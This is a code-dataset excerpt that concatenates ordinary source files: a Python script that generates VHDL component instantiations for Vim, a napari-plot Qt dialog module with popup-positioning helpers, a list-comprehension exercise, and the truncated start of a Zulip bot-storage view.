] | 3 | 2017-06-13T10:26:47.000Z | 2017-09-12T15:41:41.000Z | plugin/instVHDL.py | B00Ze/instVhdl | e359035dc6a17f82ae109571a8bf07760911b4ef | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
# -----------------------------------------------------------------------------
# Name: VHDL instantiation script
# Purpose: Using with VIM
#
# Author: BooZe
#
# Created: 25.03.2013
# Copyright: (c) BooZe 2013
# Licence: BSD
# -----------------------------------------------------------------------------
import re
import sys
if __name__ == "__main__":
command_line_interface(sys.argv)
| 33.77931 | 79 | 0.56717 | #!/usr/bin/python
# -----------------------------------------------------------------------------
# Name: VHDL instantiation script
# Purpose: Using with VIM
#
# Author: BooZe
#
# Created: 25.03.2013
# Copyright: (c) BooZe 2013
# Licence: BSD
# -----------------------------------------------------------------------------
import re
import sys
class port(object):
    """A single named connection with an associated VHDL type string."""

    def __init__(self, portName, portType):
        # Identifier (e.g. "clk") and its type text (e.g. "std_logic").
        self.portName = portName
        self.portType = portType

    def getName(self):
        """Return the port identifier."""
        return self.portName

    def setName(self, portName):
        """Replace the port identifier."""
        self.portName = portName

    def getType(self):
        """Return the VHDL type string."""
        return self.portType

    def setType(self, portType):
        """Replace the VHDL type string."""
        self.portType = portType
class genericPort(port):
    """A port that additionally carries a default value (a VHDL generic)."""

    def __init__(self, portName, portType, defaultValue):
        super().__init__(portName, portType)
        self.defaultValue = defaultValue

    def setDefault(self, defaultValue):
        """Replace the default-value string."""
        self.defaultValue = defaultValue

    def getDefault(self):
        """Return the default-value string ("" means no default)."""
        return self.defaultValue
class genericPortVHDL(genericPort):
    """VHDL-flavoured generic port able to render itself as declaration text."""

    def __init__(self, portName, portType, defaultValue):
        # genericPort.__init__ already stores defaultValue; the original
        # assigned it a second time redundantly.
        genericPort.__init__(self, portName, portType, defaultValue)

    def getStrAligned(self, nameMax):
        """Return the declaration line with the name column padded to *nameMax*.

        A non-empty default renders as ``name : type := default;``.
        """
        nameLen = len(self.getName())
        strDefault = self.getDefault()
        if strDefault != "":
            strDefault = " := "+strDefault
        return [self.getName()+" "*(nameMax-nameLen)+" : "+self.getType() +
                strDefault+";"]

    def getStrList(self):
        """Return the unaligned ``name : type;`` declaration line."""
        return [self.getName()+" : "+self.getType()+";"]
class inoutPort(port):
    """A port that also records its direction keyword (in / out / inout)."""

    def __init__(self, portName, portType, inoutType):
        super().__init__(portName, portType)
        self.inoutType = inoutType

    def setInout(self, inoutType):
        """Replace the direction keyword."""
        self.inoutType = inoutType

    def getInout(self):
        """Return the direction keyword."""
        return self.inoutType
class inoutPortVHDL(inoutPort):
    """VHDL-flavoured directional port able to render itself as text."""

    def __init__(self, portName, portType, inoutType):
        # inoutPort.__init__ already stores inoutType; the original repeated
        # the assignment redundantly.
        inoutPort.__init__(self, portName, portType, inoutType)

    def getStrAligned(self, nameMax, inoutMax):
        """Return the declaration with name and direction columns aligned."""
        nameLen = len(self.getName())
        inoutLen = len(self.getInout())
        return [self.getName()+" "*(nameMax-nameLen)+" : "+self.getInout() +
                " "*(inoutMax-inoutLen)+' '+self.getType()+";"]

    def getStrList(self):
        """Return the unaligned ``name : type;`` line (direction omitted)."""
        return [self.getName()+" : "+self.getType()+";"]
class component(object):
    """Model of one HDL component: its name, library, generics and ports.

    ``portMaxLen`` and ``inoutMaxLen`` track the widest port/generic name
    and the widest direction keyword seen so far, so that renderers can
    align declaration columns.
    """

    def __init__(self, name):
        self.name = name
        self.lib = "Default_lib"
        self.genericList = []
        self.inoutList = []
        # Widest port/generic name seen so far (column alignment).
        self.portMaxLen = 0
        # Widest direction keyword ("in"/"out"/"inout") seen so far.
        self.inoutMaxLen = 0

    def getName(self):
        """Return the component name."""
        return self.name

    def setName(self, name):
        """Replace the component name."""
        self.name = name

    def getLib(self):
        """Return the target library name."""
        return self.lib

    def setLib(self, lib):
        """Replace the target library name."""
        self.lib = lib

    def addGeneric(self, genericPort):
        """Append an already-built generic object, tracking name width."""
        strLen = len(genericPort.getName())
        if strLen > self.portMaxLen:
            self.portMaxLen = strLen
        self.genericList.append(genericPort)

    def addGenericStr(self, portName, portType, defaultValue):
        """Build a generic from raw strings and append it."""
        tmp = genericPort(portName, portType, defaultValue)
        strLen = len(portName)
        if strLen > self.portMaxLen:
            self.portMaxLen = strLen
        self.genericList.append(tmp)

    def setGeneric(self, genericList):
        """Replace the generic list, refreshing the name-column width.

        Bug fix: the original called ``getName`` on the *list* itself
        (``genericList.getName()``) instead of on each element, raising
        AttributeError for any non-empty list.
        """
        for gen in genericList:
            strNameLen = len(gen.getName())
            if strNameLen > self.portMaxLen:
                self.portMaxLen = strNameLen
        self.genericList = genericList

    def getGeneric(self):
        """Return the list of generic objects."""
        return self.genericList

    def addInoutStr(self, portName, portType, inoutType):
        """Build a directional port from raw strings and append it."""
        strNameLen = len(portName)
        if strNameLen > self.portMaxLen:
            self.portMaxLen = strNameLen
        strInoutLen = len(inoutType)
        if strInoutLen > self.inoutMaxLen:
            self.inoutMaxLen = strInoutLen
        tmp = inoutPortVHDL(portName, portType, inoutType)
        self.inoutList.append(tmp)
class componentVHDL(component):
    """VHDL-flavoured component.

    Adds text rendering (component declaration, USE clause, generic/port
    maps, LIBRARY line) and parsing of a VHDL entity declaration from a
    source file.  Rendered lines are tab-indented and newline-terminated.
    """
    def addGenericStr(self, portName, portType, defaultValue):
        """Build a genericPortVHDL from raw strings and append it."""
        tmp = genericPortVHDL(portName, portType, defaultValue)
        strLen = len(portName)
        if strLen > self.portMaxLen:
            self.portMaxLen = strLen
        self.genericList.append(tmp)
    def getStrGeneric(self):
        """Return the "generic ( ... );" block lines, or [] when no generics."""
        listOut = []
        if (self.genericList != []):
            listOut.append("\tgeneric (\n")
            for gen in self.getGeneric():
                for strAl in gen.getStrAligned(self.portMaxLen):
                    listOut.append("\t\t"+strAl+"\n")
            # Strip the trailing ";" from the last declaration line.
            listOut[-1] = listOut[-1][:-2]+"\n"
            listOut.append("\t);\n")
        return listOut
    def getStrEntity(self):
        """Return the "port ( ... );" block lines.

        NOTE(review): assumes at least one port was parsed; with an empty
        inoutList the ";"-stripping line mangles the "port (" header.
        """
        listOut = ["\tport (\n"]
        for port in self.inoutList:
            for strAl in port.getStrAligned(self.portMaxLen, self.inoutMaxLen):
                listOut.append("\t\t"+strAl+"\n")
        listOut[-1] = listOut[-1][:-2]+"\n"
        listOut.append("\t);\n")
        return listOut
    def getStrUse(self):
        """Return the "FOR ALL : name USE ENTITY lib.name;" binding line."""
        return ["\tFOR ALL : "+self.getName()+" USE ENTITY "+self.getLib() +
                "."+self.getName()+";\n"]
    def getStrMap(self):
        """Return instantiation lines: label, generic map and port map.

        Every generic/port is associated with a signal of its own name;
        the instance label is the component name suffixed with "0".
        """
        strOut = ["\t"+self.getName()+"0 : "+self.getName()+"\n"]
        if self.genericList != []:
            strOut += ["\t\tgeneric map (\n"]
            for gen in self.genericList:
                genNameLen = len(gen.getName())
                strOut += ["\t\t\t"+gen.getName() +
                           " "*(self.portMaxLen-genNameLen) +
                           " => "+gen.getName()+",\n"]
            # Strip the trailing "," from the last association.
            strOut[-1] = strOut[-1][:-2]+"\n"
            strOut += ["\t\t)\n"]
        strOut += ["\t\tport map(\n"]
        for inout in self.inoutList:
            inoutNameLen = len(inout.getName())
            strOut += ["\t\t\t"+inout.getName() +
                       " "*(self.portMaxLen-inoutNameLen) +
                       " => "+inout.getName()+",\n"]
        strOut[-1] = strOut[-1][:-2]+"\n"
        strOut += ["\t\t);\n"]
        return strOut
    def getStrLib(self):
        """Return the "LIBRARY <lib>;" declaration line."""
        return ["LIBRARY "+self.getLib()+";\n"]
    def getStrComponent(self):
        """Return the full "component ... end component;" declaration."""
        strOut = ["component "+self.getName()+"\n"]
        strOut += self.getStrGeneric()
        strOut += self.getStrEntity()
        strOut += ["end component;\n"]
        # Indent the whole declaration by one extra tab.
        for ind in range(len(strOut)):
            strOut[ind] = "\t"+strOut[ind]
        return strOut
    def parseLib(self, fileName):
        """Derive the library from a "<name>_lib" directory in the file path.

        Falls back to "SomeLib" when no such path component exists.
        """
        import os
        separator = os.path.sep
        if separator == '\\':
            # Escape the Windows backslash so it is a regex literal.
            separator = r'\\'
        libRe = separator + r"[\w]+_lib" + separator
        libName = re.compile(libRe, re.I)
        resLib = libName.search(fileName)
        if resLib is not None:
            # Strip the surrounding path separators from the match.
            self.setLib(resLib.group()[1:-1])
        else:
            self.setLib("SomeLib")
    def parseGenerics(self, genericStr):
        """Parse the text of a "generic ( ... )" clause into genericList."""
        openParPlace = genericStr.find("(")
        closeParPlace = genericStr.rfind(")")
        # Checking for empty generics list
        if (openParPlace == -1 or closeParPlace == -1):
            return
        genericContent = genericStr[openParPlace+1:closeParPlace]
        # Generic list creation
        genericList = genericContent.split(";")
        for gen in genericList:
            partLst = gen.split(":")
            # First - parameter name, second - type, last - default value
            if len(partLst) > 1:
                parName = partLst[0].strip(" ")
                parType = partLst[1].strip(" ")
                if len(partLst) == 3:
                    parDefVal = partLst[2]
                    # Removing = sign
                    parDefVal = parDefVal.strip("=")
                    parDefVal = parDefVal.strip(" ")
                else:
                    parDefVal = ""
                self.addGenericStr(parName, parType, parDefVal)
    def parsePorts(self, portString):
        """Parse the text of a "port ( ... )" clause into inoutList."""
        openParPlace = portString.find("(")
        closeParPlace = portString.rfind(")")
        # Checking for empty port list
        if (openParPlace == -1 or closeParPlace == -1):
            return
        genericContent = portString[openParPlace+1:closeParPlace]
        # Generic list creation
        genericList = genericContent.split(";")
        for gen in genericList:
            partLst = gen.split(":")
            # First - port name, second - type with inout type
            if len(partLst) > 1:
                portName = partLst[0].strip()
                typeWords = partLst[1].split()
                portInout = typeWords[0]
                portType = " ".join(typeWords[1:])
                self.addInoutStr(portName, portType, portInout)
    def parseEntity(self, entityFile):
        """Read *entityFile*, set self.name and parse its generics/ports."""
        entityStr = ""
        with open(entityFile, "r") as f:
            # Search for the entity name in "entity <name> is"
            entNameRE = re.compile(r"(?<=entity)[ \t]+[\w]+[ \t]+(?=is)", re.I)
            entName = None
            line = None
            while (entName is None and line != ""):
                line = f.readline()
                entName = entNameRE.search(line)
            if entName is None:
                self.name = "someEnt"
            else:
                self.name = entName.group().strip()
            # Accumulate the entity body up to the closing "end"
            entEndER = re.compile(r"\bend\b", re.I)
            entEnd = None
            while(entEnd is None and line != ""):
                line = f.readline()
                # Comment removing
                commentBeg = line.find("--")
                # NOTE(review): with no "--" present, find() returns -1 and
                # line[:-1] drops the final character (usually the newline).
                lineSearch = line[:commentBeg]
                entEnd = entEndER.search(lineSearch)
                if (entEnd is None):
                    # Adding to entity string
                    entityStr += lineSearch
        portRE = re.compile(r"\bport\b", re.I)
        entSplit = portRE.split(entityStr)
        # Parsing of generic and port list
        if (len(entSplit) == 2):
            self.parseGenerics(entSplit[0])
            self.parsePorts(entSplit[1])
        elif (len(entSplit) == 1):
            self.parsePorts(entSplit[0])
    def parseFile(self, fileName):
        """Parse library (from the path) and entity (from the content)."""
        # Getting library
        self.parseLib(fileName)
        # Getting entity content
        self.parseEntity(fileName)
class EntityInstantiator():
    """Merges an instantiation of a parsed VHDL entity into a target file.

    The target is scanned for anchor lines (library declarations,
    "end component", "USE ENTITY" clauses, the architecture "begin"); the
    LIBRARY line, component declaration, USE binding and generic/port map
    are then inserted at the appropriate places.
    """
    def __init__(self):
        # Regexes locating the anchor lines in the target file.
        self.libRe = re.compile(r"(?<=library)[\w \t]+", re.I)
        self.compRe = re.compile(r"end[\t ]+component", re.I)
        self.useRe = re.compile(r"USE[ \t]+ENTITY", re.I)
        self.archRe = re.compile(r"begin", re.I)
        # True when the target already declares the source's library.
        self.libExist = False
        # Indices of the last matching anchor lines (-1 means "not found").
        self.libLine = -1
        self.archLine = -1
        self.compLine = -1
        self.useLine = -1
        self._currBuffer = []
    def parseSourceFile(self, sourceFileName):
        """Parse the entity to instantiate into self.sourceInst."""
        self.sourceInst = componentVHDL("")
        self.sourceInst.parseFile(sourceFileName)
    def parseTargetFile(self, destinationFileName):
        """Read the target file and record the anchor line indices.

        Scanning stops at the first line starting the architecture body
        ("begin").  NOTE(review): opened "r+" although only read here.
        """
        with open(destinationFileName, "r+") as buffFile:
            self._currBuffer = buffFile.readlines()
        for i in range(len(self._currBuffer)):
            line = self._currBuffer[i]
            resLib = self.libRe.search(line)
            if resLib is not None:
                self.libLine = i
                lib = resLib.group()
                lib = lib.strip()
                # Case-insensitive comparison with the source's library.
                if lib.lower() == self.sourceInst.getLib().lower():
                    self.libExist = True
            resComp = self.compRe.search(line)
            if resComp is not None:
                self.compLine = i
            useComp = self.useRe.search(line)
            if useComp is not None:
                self.useLine = i
            resArch = self.archRe.match(line)
            if resArch is not None:
                self.archLine = i
                break
    def _mergeLibraryDeclaration(self):
        """Copy up to the last library line; add ours unless already present."""
        if (self.libLine >= 0) and not(self.libExist):
            self._mergeBuff += self._currBuffer[:self.libLine+1]
            self._mergeBuff += self.sourceInst.getStrLib()
            self.strPtr = self.libLine+1
    def _mergeComponentDeclaration(self):
        """Insert the component declaration after the last "end component",
        or just before the architecture "begin" when none exists."""
        if self.compLine >= 0:
            self._mergeBuff += self._currBuffer[self.strPtr:self.compLine+1]
            self._mergeBuff += self.sourceInst.getStrComponent()
            self.strPtr = self.compLine+1
        elif self.archLine >= 0:
            self._mergeBuff += self._currBuffer[self.strPtr:self.archLine]
            self._mergeBuff += self.sourceInst.getStrComponent()
            self.strPtr = self.archLine
    def _mergeComponentMap(self):
        """Insert the USE ENTITY binding after the last existing one,
        or just before the architecture "begin" when none exists."""
        if self.useLine >= 0:
            self._mergeBuff += self._currBuffer[self.strPtr:self.useLine+1]
            self._mergeBuff += self.sourceInst.getStrUse()
            self.strPtr = self.useLine+1
        elif self.archLine >= 0:
            self._mergeBuff += self._currBuffer[self.strPtr:self.archLine]
            self._mergeBuff += self.sourceInst.getStrUse()
            self.strPtr = self.archLine
    def _mergeBlockInstance(self, currLine):
        """Insert the instantiation (generic/port map) before *currLine*."""
        if currLine >= 0:
            self._mergeBuff += self._currBuffer[self.strPtr:currLine-1]
            self._mergeBuff += self.sourceInst.getStrMap()
            self.strPtr = currLine-1
    def _mergeTargetTail(self):
        """Copy the remainder of the target buffer unchanged."""
        self._mergeBuff += self._currBuffer[self.strPtr:]
    def mergeSourceTarget(self, currLine):
        """Build and return the merged target text, inserting at *currLine*."""
        self._mergeBuff = []
        self.strPtr = 0
        self._mergeLibraryDeclaration()
        self._mergeComponentDeclaration()
        self._mergeComponentMap()
        self._mergeBlockInstance(currLine)
        self._mergeTargetTail()
        strOut = ''.join(self._mergeBuff)
        return strOut
    def instantiate(self, entityFileName, bufferFileName, currLine):
        """Parse source and target, merge, and write the result back.

        NOTE(review): "rb+" rewrites in place without truncating; this only
        works because merging never produces a shorter buffer (insertions
        only).
        """
        self.parseSourceFile(entityFileName)
        self.parseTargetFile(bufferFileName)
        strOut = self.mergeSourceTarget(currLine)
        with open(bufferFileName, "rb+") as file:
            file.write(bytearray(strOut.encode('UTF-8')))
def instantiateEntityVHDL(entityFileName, bufferFileName, currLine):
    """Instantiate the VHDL entity from *entityFileName* into *bufferFileName*."""
    EntityInstantiator().instantiate(entityFileName, bufferFileName, currLine)
def instantiateEntity(entityFileName, bufferFileName, currLine):
    """Dispatch instantiation by source-file extension (.vhd only for now).

    Files without the ".vhd" suffix are silently ignored.
    """
    # str.endswith is the idiomatic (and equivalent) form of the original
    # four-character slice comparison.
    if entityFileName.endswith('.vhd'):
        instantiateEntityVHDL(entityFileName, bufferFileName, currLine)
def command_line_interface(cmd_args):
    """Validate argv and run the instantiation; exit with code 2 on misuse."""
    usage = """Usage of script:
    python instVHDL.py input_file output_file str_num
    """
    if len(cmd_args) != 4:
        print(usage)
        sys.exit(2)
    instantiateEntity(cmd_args[1], cmd_args[2], int(cmd_args[3]))
# Script entry point: forward the raw argv to the CLI handler.
if __name__ == "__main__":
    command_line_interface(sys.argv)
| 12,634 | 45 | 1,570 |
27a4b454c13017dbad93e43670f4dc71e0bcd006 | 6,576 | py | Python | napari_plot/_qt/qt_dialog.py | lukasz-migas/napari-1d | b0f081a8711ae941b3e4b5c58c3aea56bd0e3277 | [
"BSD-3-Clause"
] | 13 | 2021-08-27T23:01:09.000Z | 2022-03-22T13:51:35.000Z | napari_plot/_qt/qt_dialog.py | lukasz-migas/napari-1d | b0f081a8711ae941b3e4b5c58c3aea56bd0e3277 | [
"BSD-3-Clause"
] | 71 | 2021-08-28T13:29:17.000Z | 2022-03-28T21:22:12.000Z | napari_plot/_qt/qt_dialog.py | lukasz-migas/napari-1d | b0f081a8711ae941b3e4b5c58c3aea56bd0e3277 | [
"BSD-3-Clause"
] | null | null | null | from qtpy.QtCore import QPoint, Qt
from qtpy.QtGui import QCursor
from qtpy.QtWidgets import QApplication, QDialog, QHBoxLayout, QLayout, QWidget
from . import helpers as hp
class QtDialog(QDialog):
"""Dialog base class"""
_icons = None
_main_layout = None
def on_close(self):
"""Close window"""
self.close()
def _on_teardown(self):
"""Execute just before deletion"""
def closeEvent(self, event):
"""Close event"""
self._on_teardown()
return super().closeEvent(event)
def make_panel(self) -> QLayout:
"""Make panel"""
...
def make_gui(self):
"""Make and arrange main panel"""
# make panel
layout = self.make_panel()
if layout is None:
raise ValueError("Expected layout")
# pack element
self.setLayout(layout)
self._main_layout = layout
def show_above_widget(self, widget: QWidget, show: bool = True, y_offset: int = 14):
"""Show popup dialog above the widget"""
rect = widget.rect()
pos = widget.mapToGlobal(QPoint(rect.left() + rect.width() / 2, rect.top()))
sz_hint = self.size()
pos -= QPoint(sz_hint.width() / 2, sz_hint.height() + y_offset)
self.move(pos)
if show:
self.show()
def show_above_mouse(self, show: bool = True):
"""Show popup dialog above the mouse cursor position."""
pos = QCursor().pos() # mouse position
sz_hint = self.sizeHint()
pos -= QPoint(sz_hint.width() / 2, sz_hint.height() + 14)
self.move(pos)
if show:
self.show()
def show_below_widget(self, widget: QWidget, show: bool = True, y_offset: int = 14):
"""Show popup dialog above the widget"""
rect = widget.rect()
pos = widget.mapToGlobal(QPoint(rect.left() + rect.width() / 2, rect.top()))
sz_hint = self.size()
pos -= QPoint(sz_hint.width() / 2, -y_offset)
self.move(pos)
if show:
self.show()
def show_below_mouse(self, show: bool = True):
"""Show popup dialog above the mouse cursor position."""
pos = QCursor().pos() # mouse position
sz_hint = self.sizeHint()
pos -= QPoint(sz_hint.width() / 2, -14)
self.move(pos)
if show:
self.show()
def show_right_of_widget(self, widget: QWidget, show: bool = True, x_offset: int = 14):
"""Show popup dialog above the widget"""
rect = widget.rect()
pos = widget.mapToGlobal(QPoint(rect.left() + rect.width() / 2, rect.top()))
sz_hint = self.size()
pos -= QPoint(-x_offset, sz_hint.height() / 4)
self.move(pos)
if show:
self.show()
def show_right_of_mouse(self, show: bool = True):
"""Show popup dialog on the right hand side of the mouse cursor position"""
pos = QCursor().pos() # mouse position
sz_hint = self.sizeHint()
pos -= QPoint(-14, sz_hint.height() / 4)
self.move(pos)
if show:
self.show()
def show_left_of_widget(self, widget: QWidget, show: bool = True, x_offset: int = 14):
"""Show popup dialog above the widget"""
rect = widget.rect()
pos = widget.mapToGlobal(QPoint(rect.left(), rect.top()))
sz_hint = self.size()
pos -= QPoint(sz_hint.width() + 14, sz_hint.height() / 4)
self.move(pos)
if show:
self.show()
def show_left_of_mouse(self, show: bool = True):
"""Show popup dialog on the left hand side of the mouse cursor position"""
pos = QCursor().pos() # mouse position
sz_hint = self.sizeHint()
pos -= QPoint(sz_hint.width() + 14, sz_hint.height() / 4)
self.move(pos)
if show:
self.show()
class QtFramelessPopup(QtDialog):
"""Frameless dialog"""
# attributes used to move windows around
_old_window_pos, _move_handle = None, None
def _make_move_handle(self) -> QHBoxLayout:
"""Make handle button that helps move the window around"""
self._move_handle = hp.make_qta_label(
self,
"move",
tooltip="Click here and drag the mouse around to move the window.",
)
self._move_handle.setCursor(Qt.PointingHandCursor)
layout = QHBoxLayout()
layout.addStretch(1)
layout.addWidget(self._move_handle)
return layout
def mousePressEvent(self, event):
"""mouse press event"""
super().mousePressEvent(event)
# allow movement of the window when user uses right-click and the move handle button does not exist
if event.button() == Qt.RightButton and self._move_handle is None:
self._old_window_pos = event.x(), event.y()
elif self._move_handle is None:
self._old_window_pos = None
elif self.childAt(event.pos()) == self._move_handle:
self._old_window_pos = event.x(), event.y()
def mouseMoveEvent(self, event):
"""Mouse move event - ensures its possible to move the window to new location"""
super().mouseMoveEvent(event)
if self._old_window_pos is not None:
self.move(
event.globalX() - self._old_window_pos[0],
event.globalY() - self._old_window_pos[1],
) # noqa
def mouseReleaseEvent(self, event):
"""mouse release event"""
super().mouseReleaseEvent(event)
self._old_window_pos = None
class QtFramelessTool(QtFramelessPopup):
"""Frameless dialog that stays on top"""
| 33.55102 | 107 | 0.594891 | from qtpy.QtCore import QPoint, Qt
from qtpy.QtGui import QCursor
from qtpy.QtWidgets import QApplication, QDialog, QHBoxLayout, QLayout, QWidget
from . import helpers as hp
class QtDialog(QDialog):
    """Base dialog: subclasses implement ``make_panel`` to supply the layout.

    Also provides helpers to position the dialog relative to a widget or
    the mouse cursor.  Bug fixes versus the original: all ``QPoint``
    coordinates now use integer (floor) division — true division produces
    floats, which PyQt rejects with TypeError — and
    ``show_left_of_widget`` honours its ``x_offset`` parameter (it was
    silently ignored before).
    """

    _icons = None
    _main_layout = None

    def __init__(self, parent=None, title: str = "Dialog"):
        QDialog.__init__(self, parent)
        self._parent = parent
        self.setWindowTitle(QApplication.translate(str(self), title, None, -1))
        self.setAttribute(Qt.WA_DeleteOnClose)
        self.make_gui()

    def on_close(self):
        """Close window"""
        self.close()

    def _on_teardown(self):
        """Execute just before deletion"""

    def closeEvent(self, event):
        """Run the teardown hook, then the default close handling."""
        self._on_teardown()
        return super().closeEvent(event)

    def make_panel(self) -> QLayout:
        """Build and return the dialog's main layout (subclass hook)."""
        ...

    def make_gui(self):
        """Make and arrange main panel"""
        # make panel
        layout = self.make_panel()
        if layout is None:
            raise ValueError("Expected layout")
        # pack element
        self.setLayout(layout)
        self._main_layout = layout

    def show_above_widget(self, widget: QWidget, show: bool = True, y_offset: int = 14):
        """Show popup dialog above the widget"""
        rect = widget.rect()
        # "//" (not "/"): QPoint requires int coordinates.
        pos = widget.mapToGlobal(QPoint(rect.left() + rect.width() // 2, rect.top()))
        sz_hint = self.size()
        pos -= QPoint(sz_hint.width() // 2, sz_hint.height() + y_offset)
        self.move(pos)
        if show:
            self.show()

    def show_above_mouse(self, show: bool = True):
        """Show popup dialog above the mouse cursor position."""
        pos = QCursor().pos()  # mouse position
        sz_hint = self.sizeHint()
        pos -= QPoint(sz_hint.width() // 2, sz_hint.height() + 14)
        self.move(pos)
        if show:
            self.show()

    def show_below_widget(self, widget: QWidget, show: bool = True, y_offset: int = 14):
        """Show popup dialog below the widget"""
        rect = widget.rect()
        pos = widget.mapToGlobal(QPoint(rect.left() + rect.width() // 2, rect.top()))
        sz_hint = self.size()
        pos -= QPoint(sz_hint.width() // 2, -y_offset)
        self.move(pos)
        if show:
            self.show()

    def show_below_mouse(self, show: bool = True):
        """Show popup dialog below the mouse cursor position."""
        pos = QCursor().pos()  # mouse position
        sz_hint = self.sizeHint()
        pos -= QPoint(sz_hint.width() // 2, -14)
        self.move(pos)
        if show:
            self.show()

    def show_right_of_widget(self, widget: QWidget, show: bool = True, x_offset: int = 14):
        """Show popup dialog to the right of the widget"""
        rect = widget.rect()
        pos = widget.mapToGlobal(QPoint(rect.left() + rect.width() // 2, rect.top()))
        sz_hint = self.size()
        pos -= QPoint(-x_offset, sz_hint.height() // 4)
        self.move(pos)
        if show:
            self.show()

    def show_right_of_mouse(self, show: bool = True):
        """Show popup dialog on the right hand side of the mouse cursor position"""
        pos = QCursor().pos()  # mouse position
        sz_hint = self.sizeHint()
        pos -= QPoint(-14, sz_hint.height() // 4)
        self.move(pos)
        if show:
            self.show()

    def show_left_of_widget(self, widget: QWidget, show: bool = True, x_offset: int = 14):
        """Show popup dialog to the left of the widget"""
        rect = widget.rect()
        pos = widget.mapToGlobal(QPoint(rect.left(), rect.top()))
        sz_hint = self.size()
        # Bug fix: use x_offset (the original hard-coded 14, ignoring it).
        pos -= QPoint(sz_hint.width() + x_offset, sz_hint.height() // 4)
        self.move(pos)
        if show:
            self.show()

    def show_left_of_mouse(self, show: bool = True):
        """Show popup dialog on the left hand side of the mouse cursor position"""
        pos = QCursor().pos()  # mouse position
        sz_hint = self.sizeHint()
        pos -= QPoint(sz_hint.width() + 14, sz_hint.height() // 4)
        self.move(pos)
        if show:
            self.show()
class QtFramelessPopup(QtDialog):
    """Frameless dialog that can be dragged via a "move" handle."""
    # attributes used to move windows around
    _old_window_pos, _move_handle = None, None
    def __init__(
        self,
        parent,
        title="",
        position=None,
        flags=Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint | Qt.Popup,
    ):
        super().__init__(parent, title)
        self.setAttribute(Qt.WA_DeleteOnClose)
        self.setAttribute(Qt.WA_ShowWithoutActivating)
        self.setWindowFlags(flags)
        # Move to the requested position when one was supplied.
        if position is not None:
            self.move(position)
    def _make_move_handle(self) -> QHBoxLayout:
        """Make handle button that helps move the window around"""
        self._move_handle = hp.make_qta_label(
            self,
            "move",
            tooltip="Click here and drag the mouse around to move the window.",
        )
        self._move_handle.setCursor(Qt.PointingHandCursor)
        layout = QHBoxLayout()
        layout.addStretch(1)
        layout.addWidget(self._move_handle)
        return layout
    def mousePressEvent(self, event):
        """Record the drag origin; right-click drags when no handle exists."""
        super().mousePressEvent(event)
        # allow movement of the window when user uses right-click and the move handle button does not exist
        if event.button() == Qt.RightButton and self._move_handle is None:
            self._old_window_pos = event.x(), event.y()
        elif self._move_handle is None:
            self._old_window_pos = None
        elif self.childAt(event.pos()) == self._move_handle:
            self._old_window_pos = event.x(), event.y()
    def mouseMoveEvent(self, event):
        """Mouse move event - ensures its possible to move the window to new location"""
        super().mouseMoveEvent(event)
        if self._old_window_pos is not None:
            self.move(
                event.globalX() - self._old_window_pos[0],
                event.globalY() - self._old_window_pos[1],
            ) # noqa
    def mouseReleaseEvent(self, event):
        """End any window drag currently in progress."""
        super().mouseReleaseEvent(event)
        self._old_window_pos = None
class QtFramelessTool(QtFramelessPopup):
    """Frameless dialog that stays on top"""
    def __init__(
        self,
        parent,
        title: str = "",
        position=None,
        flags=Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint | Qt.Tool,
    ):
        # Differs from QtFramelessPopup only in the default window flags
        # (Qt.Tool instead of Qt.Popup).
        super().__init__(parent, title, position, flags)
| 849 | 0 | 81 |
b5e71b4f7c95803d854afa2f0cfa1afffd4452f2 | 360 | py | Python | HackerRank/python/list_compre.py | tuvshinot/algorithm-sorting-DS | 784c2338fb92f9d2f4da6294f242563031a09c4c | [
"MIT"
] | null | null | null | HackerRank/python/list_compre.py | tuvshinot/algorithm-sorting-DS | 784c2338fb92f9d2f4da6294f242563031a09c4c | [
"MIT"
] | null | null | null | HackerRank/python/list_compre.py | tuvshinot/algorithm-sorting-DS | 784c2338fb92f9d2f4da6294f242563031a09c4c | [
"MIT"
] | null | null | null | x = 2
y = 2
n = 2
# ar = []
# p = 0
# for i in range ( x + 1 ) :
# for j in range( y + 1):
# if i+j != n:
# ar.append([])
# ar[p] = [ i , j ]
# p+=1
# print(ar)
x = 2
y = 2
z = 2
n = 2
lst = [[i, j, k] for i in range(x + 1) for j in range(y + 1) for k in range(z + 1) if i + j + k != n]
print(lst) | 15.652174 | 101 | 0.361111 | x = 2
y = 2
n = 2
# ar = []
# p = 0
# for i in range ( x + 1 ) :
# for j in range( y + 1):
# if i+j != n:
# ar.append([])
# ar[p] = [ i , j ]
# p+=1
# print(ar)
x = 2
y = 2
z = 2
n = 2
lst = [[i, j, k] for i in range(x + 1) for j in range(y + 1) for k in range(z + 1) if i + j + k != n]
print(lst) | 0 | 0 | 0 |
9c13acfb96b6fa83f23e449c9539c2406f1c8a35 | 1,832 | py | Python | zerver/views/storage.py | dumpmemory/zulip | 496273ddbc567330a0022699d6d6eb5c646e5da5 | [
"Apache-2.0"
] | 4 | 2021-09-16T16:46:55.000Z | 2022-02-06T13:00:21.000Z | zerver/views/storage.py | dumpmemory/zulip | 496273ddbc567330a0022699d6d6eb5c646e5da5 | [
"Apache-2.0"
] | null | null | null | zerver/views/storage.py | dumpmemory/zulip | 496273ddbc567330a0022699d6d6eb5c646e5da5 | [
"Apache-2.0"
] | 1 | 2022-01-15T08:36:09.000Z | 2022-01-15T08:36:09.000Z | from typing import Dict, List, Optional
from django.http import HttpRequest, HttpResponse
from zerver.lib.bot_storage import (
StateError,
get_bot_storage,
get_keys_in_bot_storage,
remove_bot_storage,
set_bot_storage,
)
from zerver.lib.exceptions import JsonableError
from zerver.lib.request import REQ, has_request_variables
from zerver.lib.response import json_success
from zerver.lib.validator import check_dict, check_list, check_string
from zerver.models import UserProfile
@has_request_variables
@has_request_variables
@has_request_variables
| 30.533333 | 95 | 0.739629 | from typing import Dict, List, Optional
from django.http import HttpRequest, HttpResponse
from zerver.lib.bot_storage import (
StateError,
get_bot_storage,
get_keys_in_bot_storage,
remove_bot_storage,
set_bot_storage,
)
from zerver.lib.exceptions import JsonableError
from zerver.lib.request import REQ, has_request_variables
from zerver.lib.response import json_success
from zerver.lib.validator import check_dict, check_list, check_string
from zerver.models import UserProfile
@has_request_variables
def update_storage(
    request: HttpRequest,
    user_profile: UserProfile,
    storage: Dict[str, str] = REQ(json_validator=check_dict([], value_validator=check_string)),
) -> HttpResponse:
    """Store key/value pairs in the bot user's storage.

    ``storage`` is parsed from the request by @has_request_variables and
    validated as a string-to-string mapping.  Storage-layer failures
    (StateError) are reported to the client as JsonableError.
    """
    try:
